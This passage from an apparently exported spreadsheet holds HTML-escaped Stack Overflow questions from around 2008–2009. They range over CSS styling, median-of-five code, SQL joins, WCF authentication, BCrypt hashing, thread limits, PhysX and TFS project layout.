&lt;li&gt;Transer it to video memory (GPU using DMA)&lt;/li&gt;
&lt;li&gt;Further process it using vertex and fragment shaders (GPU)&lt;/li&gt;
&lt;li&gt;Render it (GPU)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm looking for some general advice explaning what extentions or technics can be used here. Is there a good reason to use Direct3D instead? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is C# a superset of C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is C# a superset of C in anyway, like Objective-C or C++? Is there a way to compile C online with constructs such compiler flags?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>css inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just added the Twitter script to my website, and cannot, despite inexpertly consulting firebug, determine how to alter the css to make the feed appear uniform with the other text on my page.&lt;/p&gt;
&lt;p&gt;The page in question is 
&lt;a href="http://willworth.co.uk/latest.htm" rel="nofollow"&gt;http://willworth.co.uk/latest.htm&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated&lt;/p&gt;
&lt;p&gt;Thank you in advance.  &lt;/p&gt;
&lt;p&gt;As I improve, I will help the community as best I can&lt;/p&gt;
&lt;p&gt;Will &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to sort a partially ordered list?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Probably best illustrated with a small example.&lt;br /&gt;
Given the relations&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A &amp;lt; B &amp;lt; C
A &amp;lt; P &amp;lt; Q
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Correct outputs would be&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ABCPQ or APQBC or APBCQ ... etc.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In other words, any ordering is valid in which the given relationships hold.&lt;/p&gt;
&lt;p&gt;I am most interested in the solution that is easiest to implement, but the best O(n) in speed and time is interesting as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set a field to null in Quest Toad "Browse Database Objects" view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question, would love a solution if there is one! I assume there has to be some keyboard shortcut that will insert a null but Google isn't helping.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a count of items in one column that match items in another column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume I have two data tables and a linking table as such:&lt;/p&gt;
&lt;pre&gt;
A         B         A_B_Link          
-----     -----     -----
ID        ID        A_ID
Name      Name      B_ID
&lt;/pre&gt;
&lt;p&gt;2 Questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I would like to write a query so that I have all of A's columns and a count of how many B's are linked to A, what is the best way to do this?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Is there a way to have a query return a row with all of the columns from A and a column containing &lt;em&gt;all&lt;/em&gt; of linked names from B (maybe separated by some delimiter?)&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Note that &lt;strong&gt;the query must return distinct rows from A&lt;/strong&gt;, so a simple left outer join is not going to work here...I'm guessing I'll need nested select statements?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code to calculate "median of five" in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Please don't interpret this as "homework question." This is just a thing I curious to know :)&lt;/p&gt;
&lt;p&gt;The median of five is sometimes used as an exercise in algorithm design and is known to be computable &lt;strong&gt;using only 6 comparisons&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;What is the best way to implement this &lt;strong&gt;"median of five using 6 comparisons"&lt;/strong&gt; in C# ? All of my attempts seem to result in awkward code :( I need nice and readable code while still using only 6 comparisons.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public double medianOfFive(double a, double b, double c, double d, double e){
	//
	// return median
	//
	return c;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; I think I should provide the "algorithm" here too:&lt;/p&gt;
&lt;p&gt;I found myself not able to explain the algorithm clearly as &lt;em&gt;Azereal&lt;/em&gt; did in his forum post. So I will reference his post here. From &lt;a href="http://www.ocf.berkeley.edu/~wwu/cgi-bin/yabb/YaBB.cgi?board=riddles_cs;action=display;num=1061827085"&gt;http://www.ocf.berkeley.edu/~wwu/cgi-bin/yabb/YaBB.cgi?board=riddles_cs;action=display;num=1061827085&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Well I was posed this problem in one
  of my assignments and I turned to this
  forum for help but no help was here. 
  I eventually found out how to do it.&lt;/p&gt;
  &lt;ol&gt;
  &lt;li&gt;&lt;p&gt;Start a mergesort with the first 4 elements and order each pair (2
  comparisons)&lt;/p&gt;&lt;/li&gt;
  &lt;li&gt;&lt;p&gt;Compare the two lower ones of each pair and eliminate the lowest one from
  the possibilities (3 comparisons)&lt;/p&gt;&lt;/li&gt;
  &lt;li&gt;&lt;p&gt;Add in the 5th number set aside to the number without a pair and compare
  the two (4 comparisons)&lt;/p&gt;&lt;/li&gt;
  &lt;li&gt;&lt;p&gt;Compare the two lowest of the two new pairs and eliminate the lower one
  (5 comparisons)&lt;/p&gt;&lt;/li&gt;
  &lt;li&gt;&lt;p&gt;Compare the one by itself and the lower of the last pair and the lower
  number is the median&lt;/p&gt;
  &lt;p&gt;The possible median is within the
  parentesis&lt;/p&gt;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;(54321)&lt;/p&gt;
  &lt;p&gt;5:4   3:2    2 comparisons&lt;/p&gt;
  &lt;p&gt;(4&amp;lt;5 2&amp;lt;3  1)  &lt;/p&gt;
  &lt;p&gt;4:2      3 comparisons&lt;/p&gt;
  &lt;p&gt;2(4&amp;lt;5 3 1)&lt;/p&gt;
  &lt;p&gt;1:3      4 comparisons&lt;/p&gt;
  &lt;p&gt;2(4&amp;lt;5 1&amp;lt;3)&lt;/p&gt;
  &lt;p&gt;4:1      5 comparisons&lt;/p&gt;
  &lt;p&gt;1,2(4&amp;lt;5 3)&lt;/p&gt;
  &lt;p&gt;4:3      6 comparisons&lt;/p&gt;
  &lt;p&gt;1,2(3)4,5  &lt;/p&gt;
  &lt;p&gt;Three is the median&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; As your request and to prevent myself from getting more downvotes, this are C++ code I wrote to find median of five. Don't mind it's awkwardness:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double StageGenerator::MedianOfFive(double n1, double n2, double n3, double n4, double n5){
    double *a = &amp;amp;n1, *b = &amp;amp;n2, *c = &amp;amp;n3, *d = &amp;amp;n4, *e = &amp;amp;n5;
    double *tmp;
    // makes a &amp;lt; b and b &amp;lt; d
    if(*b &amp;lt; *a){
    	tmp = a; a = b; b = tmp;
    }
    if(*d &amp;lt; *c){
    	tmp = c; c = d; d = tmp;
    }
    // eleminate the lowest
    if(*c &amp;lt; *a){
    	tmp = b; b = d; d = tmp; 
    	c = a;
    }
    // gets e in
    a = e;
    // makes a &amp;lt; b and b &amp;lt; d
    if(*b &amp;lt; *a){
    	tmp = a; a = b; b = tmp;
    }
    // eliminate another lowest
    // remaing: a,b,d
    if(*a &amp;lt; *c){
    	tmp = b; b = d; d = tmp; 
    	a = c;
    }
    if(*d &amp;lt; *a)
    	return *d;
    else
    	return *a;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It should be more compact, isn't it ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As @pablito pointed out in his answer. The built-in List.Sort() cannot fulfill this requirement since it uses up to 13 comparisons :]&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to corretly load DataContext of Conditional Linq-to-SQL Stored Proc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Stored Proc that do a validation on a parameter&lt;/p&gt;
&lt;p&gt;ex.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IF @SearchType = 'BNa'
BEGIN
    ... DO something
END
ELSE IF @SearchType = 'SNa'
BEGIN
    ... DO something
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So by default the Stored Proc return a scalar value and if SearchType = something valid it will return a IMultipleValues.&lt;/p&gt;
&lt;p&gt;The problem is that when I drop my Stored Proc in the DataContext designer, it creates the LINQ-to-SQL for a function that only returns a scalar int. It doesn't understands that the Strored Proc could return a IMultipleResults with a scalar value and a DataSet.&lt;/p&gt;
&lt;p&gt;Anyone know how to made LINQ-to-SQL to extrapolate the possible return values?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stored procedure name tagging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ever wonder what wikipedia's database schema looks like? I recently read this thread from &lt;a href="http://www.reddit.com/r/programming/comments/7r3mg/ever_wonder_what_the_wikipedia_database_schema/" rel="nofollow"&gt;reddit&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;I like how their tables are tagged with a prefix so you can sort of tell its functionality, purpose, and relationship with other tables right off the bat. &lt;/p&gt;
&lt;p&gt;One thing I do not notice is how they name their stored procedures. Do they even use SP? &lt;/p&gt;
&lt;p&gt;I use MS SQL Server. Prefixing all stored procedures with USP_ or SP_ seems redundant and anti-beneficial as the object explorer already sorts it all out for me. How do you name your SPs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Limiting access to a WCF REST (webHttpBinding) Service using the ASP.NET Membership Provider?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have found a lot of material on the web about using the ASP.NET Membership Provider with the wsHttpBindings, but I haven't seen any reference to using it with webHttpBindings.&lt;/p&gt;
&lt;p&gt;I am looking for a system that will work in two scenarios:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The user is logged into an asp.net website and the website is making calls to the service.&lt;/li&gt;
&lt;li&gt;The user accesses the service directly via REST.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is this possible using the built in framework (i.e. just through configuration)? If so how do I configure the service? And how does the user pass the credentials to the REST service?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use Flex to access foreign-keyed fields in Django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following Django and Flex code:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Django&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Author(models.Model):
  name = models.CharField(max_length=30)
class Book(models.Model):
  title = models.CharField(max_length=30)
  author = models.ForeignKeyField(Author)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Flex&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.myproject.models.vo
{
    [Bindable]
    [RemoteClass(alias="myproject.models.Book")]
    public class BookVO
    {
        public var id:int;
        public var title:String;
        public var author: AuthorVO;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see in this example, Author is a foreign key in my Book model.  Now I'd like to acccess the author's name when I call my BookVO in Flex.  As such, I'd expect code like the following to work, but "author_name" results in a null:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var book = new BookVO();
var author_name = book.author.name;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I realize I could call an AuthorVO directly, but the crux of this question is how can you retrieve foreign-keyed values using Flex when your VOs are bound to a remote object?  I'm currently using PyAMF to bridge the gap between Flex and Django, but I'm not sure that's relevant.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is BCrypt a good hashing algorithm to use in C#? Where can I find it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have read that when hashing a password, many programmers recommend using the BCrypt algorithm. &lt;/p&gt;
&lt;p&gt;I am programming in C# and is wondering if anyone knows of a good implementation for BCrypt? I found &lt;a href="http://derekslager.com/blog/posts/2007/10/bcrypt-dotnet-strong-password-hashing-for-dotnet-and-mono.ashx"&gt;this page&lt;/a&gt;, but I don't really know if it is bogus or not. &lt;/p&gt;
&lt;p&gt;What should I be aware of when choosing a password hashing scheme? Is BCrypt a 'good' implementation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are request cookie poperties null or incorrect on ASP.NET postback?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm debugging the HttpContext.Current.Request.Cookie values in an ASP.NET web application, and finding the only property correctly populated is the Value. The Domain and Path are null, and the Expires value is set to DateTime.Min.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way for users to import to a database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this isn't a unique issue but I've not had much luck finding examples of how others have addressed this issue. I have an intranet asp.net application I have inherited and am building upon. One particular page is for data entry to submit a claim for approval and we have a form where one record at a time can be entered and it is validated in realtime against the database for valid product information.&lt;/p&gt;
&lt;p&gt;I have been asked to add a feature where users can import a large number of records all at once to save them time of going through each text box and dropdown list one at a time for over 100 records sometimes.&lt;/p&gt;
&lt;p&gt;The solution I've looked into as my first option is to create an excel spreadsheet they can open from a link on the page that I have formatted into a template that they can copy/paste their data into, save and then upload to the server and import as a linked server object into sql server.&lt;/p&gt;
&lt;p&gt;Due to the nature of this solution and some of the data being imported I have to program some error handling into VB for the spreadsheet and if I ever find a bug to fix, there is no good way to guarentee the user is going to use the version on the page and not some local copy they saved that may break when trying to import.&lt;/p&gt;
&lt;p&gt;I've ruled out one big text box that I attempt to parse because I have no control that way over how the user enters the data.&lt;/p&gt;
&lt;p&gt;Is there some better and possibly more obvious solution that I am missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cell Format Strings for Reporting Services/Dundas Charts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Reporting services use format strings to auto format cell data.  For example "c2" formats a cell to be displayed as currency with a decimal precision of 2.&lt;/p&gt;
&lt;p&gt;Does anyone know where I'd find a comprehensive list off all the different formats available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Service or Task Scheduler for maintenance tasks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# Application that does some maintenance tasks. It needs to run roughly every hour, although it's not too important if it's a bit off. And it has to run on a Win2003 Server with no one logged in.&lt;/p&gt;
&lt;p&gt;Basically I wonder if I should write a Windows Service, and if yes, if Thread.Sleep() is a proper way to pause the Thread for an hour, or if there are better ways to make sure the Thread stays idle and does not put any server load? (aka. what is the most opposite of a Spinlock)&lt;/p&gt;
&lt;p&gt;The alternative is the Windows Task Scheduler, but I am not sure if that is good for server use since a) i'd have to store the schedule in it rather than in my app.config, b) I cannot easily control the service through start/stop/restart and c) I do not know if the Credentials of the Windows User are as secure as when I enter it in the Service MMC Snapin.&lt;/p&gt;
&lt;p&gt;What are your opinions? Is it possible and good to have an idle Service or would you recommend the task scheduler instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a file selector/opener in cocoa with Interface Builder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering how to make a button or input field in Interface Builder react in such a way that on click it opens a file dialog and lets you select one or more files and puts them into a specified array/table...&lt;/p&gt;
&lt;p&gt;Once the button is pushed and files are chosen (this seems a like quite trivial thing) I guess it will already contain some sort of array (like an array with paths to the selected files) so I've got that covered.. I only need to know how to link the button to a file selector and in what way the file selector delivers the files to me (or paths to the files) so I can redirect them to the array&lt;/p&gt;
&lt;p&gt;Is there an easy way to do this, and more importantly; is there a file selector thingie or do I have to do this with XCode instead of Interface builder?&lt;/p&gt;
&lt;p&gt;thanks...&lt;/p&gt;
&lt;p&gt;ps. I'm sorry if this isn't the right site to ask these questions&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting up multiple development environments'm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a solo developer working on a typical web project (Django + PostgresSQL) using Eclipse as my IDE and Subversion for source control. So far I've been working on a single development machine that I have setup myself. Recently, I've been asked to do some work at the customer site and there have also been a few occasions when it would have been useful to have access to the site at home. I'm thinking about what the best way to set this up is. Unfortunately, for various reasons a laptop is not a viable solution, so the solutions I am thinking of are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Installing all the necessary development tools on each machine (PostgresSQL, Eclipse, Django, Python + librariries etc.) and keeping the code in sync using SVN.&lt;/li&gt;
&lt;li&gt;Setting some kind of VNC access on my development machine and accessing it remotely to do work.&lt;/li&gt;
&lt;li&gt;Creating a Virtual machine and copying the image between all the machines using a pen drive.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The advantage of #1 is fast local development, but then I have to setup all the tools on each machine and deal with their configurations and keeping everything in sync. Also, to share code between the machines, I'd have to check it into SVN even if it's not "ready." Solution #2 solves this problem, but at the expense of slower UI experience. Finally, #3 seems like a nice solution, but I'm not sure if I can really fit a virtual image on a pen drive and I'm not sure about the performance.&lt;/p&gt;
&lt;p&gt;I guess there's not really a "correct" answer, but I'm throwing this out to get ideas and suggestions from people who have been doing this longer than me. :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the maximum number of threads in Windows Server 2003?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know?  And a bigger question is what happens when you encounter this maximum? Is this the same number with other Windows OSs such as Vista, XP etc.?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many threads is too many?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a server, and I branch each action of into a thread when the request is incoming. I do this because almost every request makes database query. I am using a threadpool library to cut down on construction/destruction of threads.&lt;/p&gt;
&lt;p&gt;My question is though - what is a good cutoff point for I/O threads like these? I know it would just be a rough estimate, but are we talking hundreds? thousands?&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;EDIT:&lt;/h3&gt;
&lt;p&gt;Thank you all for your responses, it seems like I am just going to have to test it to find out my thread count ceiling. The question is though: how do I know I've hit that ceiling? What exactly should I measure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How make scrolling function with Interface builder on the iPhone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder how is possible to make a view scroll, like in a table view.&lt;/p&gt;
&lt;p&gt;I have a form that have several fields on it. I don't wanna buil it as a traditional table that drill-down.&lt;/p&gt;
&lt;p&gt;Is not very large but because the main windows is a tab-bar I lack of a bit of vertical space. Also, when I try to fill a textfield get covered by the keywoard and I want that the focus move to the field and the view scrool, like in the safari way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Castle ActiveRecord, Web Project, and the Bin folder</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which assemblies are necessary to add to the Bin folder for ASP.NET 3.5 project that is going to use Castle ActiveRecord?   &lt;/p&gt;
&lt;p&gt;Is it:&lt;br /&gt;
Castle.ActiveRecord.dll&lt;br /&gt;
Castle.Core.dll&lt;br /&gt;
Iesi.Collections.dll&lt;br /&gt;
NHibernate.dll&lt;br /&gt;
log4net.dll  &lt;/p&gt;
&lt;p&gt;What else is needed?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to build a kind of firewall</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Actually what i am trying to build is like a kind of firewall. It should be able to get to know all the requests going from my machine. It should be able to stop selected ones. I am not sure how to even start about with this. I am having VS 2008/2005 with framework 2.0. Please let me know if there is any particular class i can start with and is there any samples i can get. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>is there some dojo.fx.sleep function to use within a dojo.fx.chain animation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to &lt;code&gt;fadeIn&lt;/code&gt; a node over one second.  Then leave it on for 10 seconds.  Then &lt;code&gt;fadeOut&lt;/code&gt; for another 3 seconds.  One way of chaining this would be as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dojo.fx.chain([
   dojo.fadeIn({node:myNode, duration:1000}), // fading in for 1 second
   dojo.fadeIn({node:myNode, duration:10000}), // this does nothing for 10 seconds
   dojo.fadeOut({node:myNode, duration:3000}) // fade out for 3 seconds
]).play();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the previous code, the middle step is a very silly way of achieving nothing.  Is there some sort of &lt;code&gt;dojo.fx.sleep&lt;/code&gt; animation that does nothing for a specified length of time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a TabBar to NavigationController based iPhone app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple NavigationController based app. The main window shows a TableView and selecting an item loads a sub-view. I used Interface Builder for UI views.&lt;/p&gt;
&lt;p&gt;Now I want to add a TabBar to the app. Where do I put it? Do I need a TabBarController? Should it go in the MainWindow.xib, or RootViewController.xib?&lt;/p&gt;
&lt;p&gt;How do I tie it together with my NavigationController?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I send a NULL in Ruby Sockets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a socket app in Ruby Shoes, and want to send a message to the server.  The server expects the XML message, and then a null (0) character.&lt;/p&gt;
&lt;p&gt;How can I send that in TCP Sockets in Ruby?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>preg_match works in regexbuddy, not in php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok so I have this regex that I created and it works fine in RegexBuddy but not when I load it into php. Below is an example of it.&lt;/p&gt;
&lt;p&gt;Using RegexBuddy I can get it to works with this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\[code\](.*)\[/code\]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And checking the dot matches newline, I added the case insensitive, but it works that way as well.&lt;/p&gt;
&lt;p&gt;Here is the php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$q = "[code]&amp;lt;div&amp;gt;html code to display on screen&amp;lt;/div&amp;gt;[/code]";
$pattern = '/\[code\](.*)\[/code\]/si';
$m = preg_match($pattern, $q, $code);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So you can see I am using [code][/code] and then once I can extract this I will run htmlentities() on it to display instead of render html code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PhysX NxActor Question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as I know, using the PhysX API, the only way to obtain an NxActor is from an instance of NxScene using the createActor method.  This is really bugging me.  I want to keep my code clean, but I feel like there is no choice but to go around passing this scene from constructor to constructor so that classes can make and have references to actors.  I suppose that, alternatively, I could make the scene global (eek!), but I don't think global variables are a good idea.  One thought I had was to have my classes simply store an NxActorDesc (and have them provide it to the scene to create the actor via message passing), but they really need references to the NxActor so that they can sync their transformations with the actor.  &lt;/p&gt;
&lt;p&gt;Anyhow, I would like to see what insight others might have.  Do you think I am going about this the right way (passing the NxScene all over the place)?  It feels kind of icky, but maybe I'm just crazy.  If not, how can I sync something such as a Model class with an NxActor in a way that is more elegant?  Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to customize wordpress "comment error" page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you enter incorrect information into the comment forms (missing name, email etc), wordpress returns an empty page with the relevant error message. I googled, but couldn't find a way to customize this response.&lt;/p&gt;
&lt;p&gt;Does anyone know how to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TFS: Hundreds of separate applications/projects - what's the best approach?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say that the company has a large number of separate small to medium applications which can be logically divided into a small number of groups.&lt;/p&gt;
&lt;p&gt;For example, I can have BMW, Mazda, Honda, Ford .... , Kawasaki, Harley, .... altogether a few dozens or even hundreds of applications.&lt;/p&gt;
&lt;p&gt;I think I have 2 options in TFS:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Create a separate project for each application. I end up with lots of small projects and can be hit by the limit, but the benefit is that I can have all workitems, bugs, reports etc. assigned separately to each project and have a portal for each project.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create a project 'Cars' and a project 'Motorcycles', and create a source control tree with a branch for each application under each project. That will provide a better structure and less overhead, but I cannot have a portal and a list of workitems, bugs, reports etc. separately for 'Honda' and separately for 'BMW' anymore.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Am I missing something? Is there a way to have both - a separate list of workitems, bugs for each small project without the overhead of creating heaps of projects with the risk of hitting the TFS limit on the number of projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone development - memory release issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running into this issue of releasing an already released object but can't for the life of me find out where the error is taking place. I have added NSZombieEnabled flag and this is the log I get in gdb. Can someone please tell me how to go about resolving this issue or rather finding out where the error occurred.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*** -[CFString release]: message sent to deallocated instance 0x5e4780 
(gdb) where
#0  0x952ff907 in ___forwarding___ ()
#1  0x952ffa12 in __forwarding_prep_0___ ()
#2  0x9260e20f in NSPopAutoreleasePool ()
#3  0x30a564b0 in _UIApplicationHandleEvent ()
#4  0x31563dea in SendEvent ()
#5  0x3156640c in PurpleEventTimerCallBack ()
#6  0x95280615 in CFRunLoopRunSpecific ()
#7  0x95280cf8 in CFRunLoopRunInMode ()
#8  0x31564600 in GSEventRunModal ()
#9  0x315646c5 in GSEventRun ()
#10 0x30a4ec98 in -[UIApplication _run] ()
#11 0x30a5a094 in UIApplicationMain ()
#12 0x00002494 in main (argc=1, argv=0xbfffef9c) at /Users/adminUser/Projects/MyProject/main.m:14
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert a string to a double in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know how to convert a string containing digits to a double.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HttpWebRequest not returning response stream when cache hit, and AllowAutoRedirect == false</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an HttpWebRequest that I've set the CachePolicy to CacheIfAvailable, and I've set AllowAutoRedirect to false.
Now when there is a cache hit, the HttpWebResponse.Status == NotModified, and there is no response stream.  I need to know what the cached response is!&lt;/p&gt;
&lt;p&gt;If I set the CachePolicy to BypassCache it works just fine.  But I need to cache these results.&lt;/p&gt;
&lt;p&gt;Can anyone tell me how to retrieve the cached response in the case of a cache hit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate a C# delegate method stub</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know how to automatically create a delegate stub method?&lt;/p&gt;
&lt;p&gt;In WPF it seems im constantly having to pass delegates around. i would like to be able to type a method name that doesnt exist and have a method stub automatically generated...currently i'am having to constantly reference the docs to get the delegate signature and then manually create method with matching signature.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the CS definition of a Php Array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From a strictly implementation and computer science point of view how would you classify the Php array datastructure? Is it an associative array? a hash? a dictionary? ... ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write a code generator given a custom IDL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you have a simple enough schema with basic boolean string fields, how to go about writing a code generator in C++. 
If you ever wrote , how did you start. Articles/recommendation welcome.&lt;/p&gt;
&lt;p&gt;EDIT: Note that this is not the standard CORBA idl.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you tell on runtime if you're running java from within a jar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that some of my users run from Eclipse, and others run it by using a jar file.&lt;/p&gt;
&lt;p&gt;I want some actions to be done when running from within the jar, but I don't want them to be done when running from Eclipse.&lt;/p&gt;
&lt;p&gt;Is there a way to know on runtime whether the current application is running from within a jar?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;Dikla&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to pass configuration to application agnostic modules?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on an application that consists of several modules which in turn will be used in other applications as well. Each of these modules needs some configuration options, but should not be aware of the options of other modules, and also should not require other modules to exist. Some settings are shared between modules.&lt;/p&gt;
&lt;p&gt;Lets say Module A requires settings x and y, Module B requires settings y and z.&lt;/p&gt;
&lt;p&gt;Settings are stored either in the registry or in one or more .ini files.&lt;/p&gt;
&lt;p&gt;So far I have considered the following approaches:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Have a global unit ("global.pas")
that is included in all modules and
contains global variables with the
settings. I don't like this approach
very much because it would require
all applications to have such a unit
and it is bound to collect lots of
additional code that has nothing to
do with the original purpose. So
eventually each application will
have its own incompatible global
unit.&lt;/li&gt;
&lt;li&gt;Have configuration classes for each module that contain all the settings required for that module. These are passed into the module from some central point in the application which also handles reading and writing them to some permanent form (e.g. use JvAppStorage). This requires some synchronisation between the modules because some options will be shared between them, so if the option is changed in one module, this change must somehow be reflected in the configuration of another module (not necessarily in real time but the next time the module is initialized).&lt;/li&gt;
&lt;li&gt;Have a generic configuration class that is passed to each module and that contains the settings for all modules as properties. Each module accesses only those settings it knows about. The problem here might be that name clashes can occur whithout being noticed. Also I don't like the idea of passing configuration options around that are not necessary for a module. In addition, every application will contain a different subset of modules but would end up containing the same configuration class with the options for all possible modules. (This isn't very different from the global unit approach above.)&lt;/li&gt;
